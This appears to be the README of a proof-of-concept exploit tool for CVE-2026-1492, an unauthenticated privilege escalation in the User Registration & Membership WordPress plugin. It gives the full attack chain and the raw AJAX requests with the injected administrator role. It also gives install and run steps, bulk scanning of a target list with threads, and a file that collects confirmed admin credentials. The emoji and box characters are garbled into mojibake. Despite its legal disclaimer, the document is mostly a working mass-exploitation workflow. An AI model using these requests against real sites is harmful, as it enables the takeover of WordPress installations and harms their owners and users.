## https://sploitus.com/exploit?id=CC22F87B-5CD4-5B03-BD22-6BB26E97C46B
# CVE-2026-1492
User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation via Membership Registration
---
## ๐ด Vulnerability Overview
### CVE-2026-1492 โ Unauthenticated Privilege Escalation via Membership Registration
| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-1492 |
| **Severity** | **CRITICAL** โ CVSS v3.1 Score: **9.8** |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Affected Software** | User Registration & Membership โ Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin for WordPress |
| **Affected Versions** | All versions up to and including **5.1.2** |
| **Vulnerability Type** | Improper Privilege Management โ Unauthenticated Administrator Account Creation |
| **Authentication Required** | **None** |
| **CWE** | CWE-269: Improper Privilege Management |
**Description:**
The **User Registration & Membership** plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation** in all versions up to and including **5.1.2**. The vulnerability stems from the `user_registration_membership_register_member` AJAX handler accepting a **user-supplied `role` value** during the membership registration process without enforcing any server-side allowlist or capability check. A completely unauthenticated remote attacker can craft a multi-step AJAX request chain โ first registering a new user account, then submitting a malicious `register_member` call with `"role": "administrator"` injected into the `members_data` JSON payload โ to silently create a fully privileged WordPress **Administrator** account. This results in complete compromise of the affected WordPress installation with zero user interaction required.
---
## ๐ ๏ธ Tool Description
This is a **Proof-of-Concept (PoC)** exploitation script implementing a **full state-aware attack chain** against WordPress sites running a vulnerable version of the **User Registration & Membership** plugin. The tool performs intelligent multi-stage exploitation with automatic discovery, plan extraction, nonce harvesting, dual-flow registration, role injection, and admin verification.
### ๐ Full Attack Chain
```
[Discovery Phase]
GET /membership-pricing/ โ Extract membership plan IDs
GET /registration/ โ Extract form fields, nonces, AJAX params
โ
[Registration Phase โ Flow A]
POST /wp-admin/admin-ajax.php
action=user_registration_user_form_submit
โ Register new user account
โ
[Role Injection Phase โ Flow A]
POST /wp-admin/admin-ajax.php
action=user_registration_membership_register_member
members_data={"role":"administrator", "membership":"", ...}
โ Inject administrator role into newly created account
โ
[Admin Verification Phase]
GET /wp-admin/ โ Check for admin dashboard indicators
GET /wp-admin/plugin-install.php โ Confirm plugin-install access
โ
[Fallback Override โ Flow B]
If Flow A admin check fails โ repeat with fresh username/email
โ
[Write to Nx_admin.txt]
Format: https://target.com/wp-login.php user: pass:
```
---
## ๐ Requirements
### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS
### Python Dependencies
```bash
pip install requests urllib3 rich
```
Or via requirements file:
```bash
pip install -r requirements.txt
```
**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0
```
---
## ๐ Installation
```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2026-1492.py
```
---
## โ๏ธ Usage
### Basic Run
```bash
python3 CVE-2026-1492.py
```
The tool uses a fully interactive terminal interface powered by **Rich**. All parameters are prompted at runtime.
---
### ๐๏ธ Target List Format
Create a plain text file (default: `list.txt`) with one target per line:
```
https://target1.com
https://target2.com
http://target3.com/wordpress
```
---
### ๐ฅ๏ธ Interactive Prompts
```
Targets file [list.txt]: list.txt
Credentials:
- Username prefix: random number is added per site (fresh user per target/plan/flow)
- Email: if left empty, it will be built from the username automatically
- Password: fixed for all sites
Username prefix (optional): Nxploited
Email (optional):
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10
```
---
## ๐ฌ Exploitation Deep Dive
### Step 1 โ Discovery
The tool automatically discovers and parses:
| Target | What is Extracted |
|---|---|
| `/membership-pricing/` | Membership plan IDs, registration page links |
| `/registration/` | Form fields, nonces, AJAX URLs, membership radio inputs |
| `user_registration_params` JS object | `ajax_url`, `security` nonce, form metadata |
| `ur_membership_frontend_localized_data` | Membership-specific nonce, AJAX endpoint |
### Step 2 โ Registration AJAX
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=
&security=
&is_membership_active=
```
### Step 3 โ Role Injection AJAX (The Vulnerable Call)
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=user_registration_membership_register_member
&members_data={"membership":"","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=
&security=
```
> โ ๏ธ The server accepts the `role` field from the client without any allowlist validation โ this is the root cause of CVE-2026-1492.
### Step 4 โ Admin Verification
The tool opens a fresh session, logs in with the newly created credentials, and probes:
| Endpoint | Indicator Checked |
|---|---|
| `/wp-admin/` | `adminmenu`, `wp-admin-bar`, `manage_options` |
| `/wp-admin/users.php` | `users.php` |
| `/wp-admin/plugin-install.php` | `upload-plugin`, `plugin-install-tab` |
---
## ๐ Output Files
| File | Description |
|---|---|
| `Nx_admin.txt` | โ Confirmed administrator accounts |
| `membership_success_log.txt` | All successful membership role-injection calls |
| `discovery_log.txt` | Full discovery data per target (nonces, IDs, fields) |
| `registration_log.txt` | All registration AJAX requests and responses |
| `membership_log.txt` | All membership AJAX requests and responses |
| `admin_check_log.txt` | Login attempts and admin verification results |
### ๏ฟฝ๏ฟฝ๏ฟฝ Admin Output Format
```
https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999
```
---
## ๐ฅ๏ธ Terminal Output Sample
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-1492 | User Registration & Membership โ Admin PoC โ
โ By: Nxploited | GitHub: github.com/Nxploited | @KNxploited โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[INFO] https://target.com
[OK] https://target.com | REG-A-OK user:Nxploited_A_482910 mem:3
[OK] https://target.com | MEM-A-OK membership A (role=administrator payload) sent
[OK] https://target.com | ADMIN-A user:Nxploited_A_482910 pass:Nx_12999 mem:3
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ๏ฟฝ๏ฟฝโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Target โ Status โ Note โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ https://target.com โ โ ADMIN-A โ user:Nxploited_A_482910 ... โ
โ https://target2.com โ MEM-B-FAIL โ membership not configured โ
โ https://target3.com โ DEAD โ connection error โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
## ๐ Status Codes Reference
| Status | Color | Meaning |
|---|---|---|
| `ADMIN-A` / `ADMIN-B` | ๐ข Green | Administrator confirmed โ Flow A or B |
| `ADMIN-A-OVERRIDE` | ๐ข Green | Admin confirmed after override attempt |
| `REG-A-FAIL` / `REG-B-FAIL` | ๐ก Yellow | Registration AJAX returned failure |
| `MEM-A-FAIL` / `MEM-B-FAIL` | ๐ฃ Magenta | Membership role-injection call failed |
| `REG-PENDING-A/B` | โซ Dark | Account requires email verification or admin approval |
| `NO-MEM-ID` | โซ Dark | Membership plan ID not found on target |
| `NO-UR-NONCE` | โซ Dark | Registration nonce not extractable |
| `NO-ADMIN` | โซ Dark | Membership OK but admin access not confirmed |
| `TIMEOUT` | โซ Dark | HTTP timeout |
| `DEAD` | โซ Dark | Connection error โ site unreachable |
| `ERROR` | ๐ด Red | Unexpected exception |
---
## ๐ก Contact & Author
By: Nxploited (Khaled Alenazi)
---
## โ ๏ธ Legal Disclaimer
> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - โ **Permitted:** Use on systems you own or have been granted **explicit written permission** to test.
> - โ **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole and full responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.
---
ยฉ 2026 Nxploited (Khaled Alenazi) โ For authorized security research only.